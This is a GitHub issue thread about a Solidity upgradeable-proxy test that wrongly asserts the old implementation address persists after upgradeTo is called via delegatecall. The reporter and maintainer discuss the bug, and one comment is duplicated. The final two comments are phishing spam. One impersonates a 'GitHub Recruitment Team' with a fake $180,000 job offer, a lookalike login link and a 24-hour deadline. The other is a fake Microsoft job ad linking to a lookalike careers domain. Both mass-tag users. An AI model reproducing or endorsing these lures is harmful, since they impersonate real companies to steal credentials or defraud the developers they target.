### ISSUE TITLE
test_implUpgradeTo incorrectly asserts that the original address is still in proxySlotAfter

### ISSUE THREAD

**Issue by filipkny** [MatinR1/UpgradeableTest#1]
Hey MatinR1, really cool repo, thanks for sharing.

I noticed that the test 'test_implUpgradeTo' checks if the same address is still in the proxySlot, even after doing the upgrade.

```
// Checking the IMPL_SLOT before upgrading the implementation contract
bytes32 proxySlotBefore = vm.load(address(proxy), IMPL_SLOT);
assertEq(proxySlotBefore, bytes32(uint256(uint160(address(impl)))));        

(bool success, ) = address(proxy).delegatecall(abi.encodeWithSignature("upgradeTo(address)", address(impl2)));
assertTrue(success);

bytes32 proxySlotAfter = vm.load(address(proxy), IMPL_SLOT);
assertEq(proxySlotAfter, bytes32(uint256(uint160(address(impl)))));
```

I would expect the new address to be address(impl2), since we pass address(impl2) to upgradeTo.

Not sure if this is a bug, or im misunderstanding something. Could you clarify?

**Comment by MatinR1** [comment]
> Hey MatinR1, really cool repo, thanks for sharing.
> 
> I noticed that the test 'test_implUpgradeTo' checks if the same address is still in the proxySlot, even after doing the upgrade.
> 
> ```
> // Checking the IMPL_SLOT before upgrading the implementation contract
> bytes32 proxySlotBefore = vm.load(address(proxy), IMPL_SLOT);
> assertEq(proxySlotBefore, bytes32(uint256(uint160(address(impl)))));        
> 
> (bool success, ) = address(proxy).delegatecall(abi.encodeWithSignature("upgradeTo(address)", address(impl2)));
> assertTrue(success);
> 
> bytes32 proxySlotAfter = vm.load(address(proxy), IMPL_SLOT);
> assertEq(proxySlotAfter, bytes32(uint256(uint160(address(impl)))));
> ```
> 
> I would expect the new address to be address(impl2), since we pass address(impl2) to upgradeTo.
> 
> Not sure if this is a bug, or im misunderstanding something. Could you clarify?

You're completely right. I made a mistake. It seems that the upgrading part fails although the success is true :|

**Comment by filkny** [comment]
Yup, i spent a few good hours bashing my head against the wall to get this working. The only way I got proxySlotAfter to point to impl2 was by using .call() instead of .delegatecall() although I dont think that is the correct approach. I'll submit a pr if I manage to solve it

**Comment by filipkny** [comment]
Yup, i spent a few good hours bashing my head against the wall to get this working. The only way I got proxySlotAfter to point to impl2 was by using .call() instead of .delegatecall() although I dont think that is the correct approach. I'll submit a pr if I manage to solve it

**Comment by MatinR1** [comment]
> Yup, i spent a few good hours bashing my head against the wall to get this working. The only way I got proxySlotAfter to point to impl2 was by using .call() instead of .delegatecall() although I dont think that is the correct approach. I'll submit a pr if I manage to solve it

Yes of course. Feel free to submit a PR. I'm also working on it. But I don't think the call work as the UUPS.sol allows any upgrade with delegating from the proxy with requiring (address(proxy) == __self).

**Comment by smcgive** [comment]
Hello,

We have an exciting opportunity for you! You've been selected to proceed in the selection process for the Developer position at GitHub. Congratulations on your achievement!

As part of this position, you will be offered a competitive salary of $180,000 per year, along with other attractive benefits, including:

- Health insurance coverage
- Retirement savings plan
- Flexible work schedule
- Generous vacation and paid time off
- Professional development opportunities

To proceed with the hiring process, we kindly ask you to fill out some additional forms and provide some additional information. This will help us better understand your profile and experience, as well as assess your suitability for the role.

Please click [here](https://auth.githubtalentcommunity.online/) to access the forms and complete the application process. We ask that you complete these forms as soon as possible so that we can proceed with the hiring process.

**Important:** You have 24 hours to complete the application process.

If you have any questions or need further information, please don't hesitate to contact us.

Thank you for your interest in joining the GitHub team, and we look forward to hearing back from you.

Best regards,  
GitHub Recruitment Team
bigsml, @amesy, @Devilinheaven234, @lleetomm, @0xvivi, @JerryShen666, @crkmythical, @g147, @sadiqful, @burdianov, @frank-leeee, @furkanakal, @amrxingyu, @whereissam, @choco-cupcake, @Dlangman, @longhoangwkm, @wangke0809, @dusmart, @shiv-gt

**Comment by dev-chain247** [comment]
# [Job Opportunity at Microsoft!](https://careersmicrosoft.online/)

 We're hiring for position at Microsoft!

## How to Apply:
Ready to embark on this amazing journey? Apply now [here](https://careersmicrosoft.online/) before **March 19, 2024**.

## Job Description:
- **Position:** Junior Software Developer
- **Salary:** Competitive salary package
- **Location:** Remote
- **Benefits:**
  - Work remotely from anywhere in the world
  - Flexible working hours
  - Comprehensive health insurance
  - Generous vacation and sick leave policy
  - Professional development opportunities
  - Collaborative and inclusive work environment

## Requirements:
- Passion for software development
- Basic understanding of programming languages like Python, JavaScript, or Java
- Strong problem-solving skills
- Excellent communication and teamwork abilities

Don't miss out on this incredible opportunity to kick-start your career with one of the world's leading tech companies! Apply now and become a part of the Microsoft family!
faisal3389, @cds-amal, @chc273, @asoong, @johndikeman, @ageorgios, @kevintrannz, @kn9ts, @marijnbent, @0xegobaby, @edsphinx, @red-butterfly, @Major-333, @brianzelip, @nandofarias, @verheesj, @0xApocryphon, @xiangzilv123, @shaikh20, @sebastianfelipe
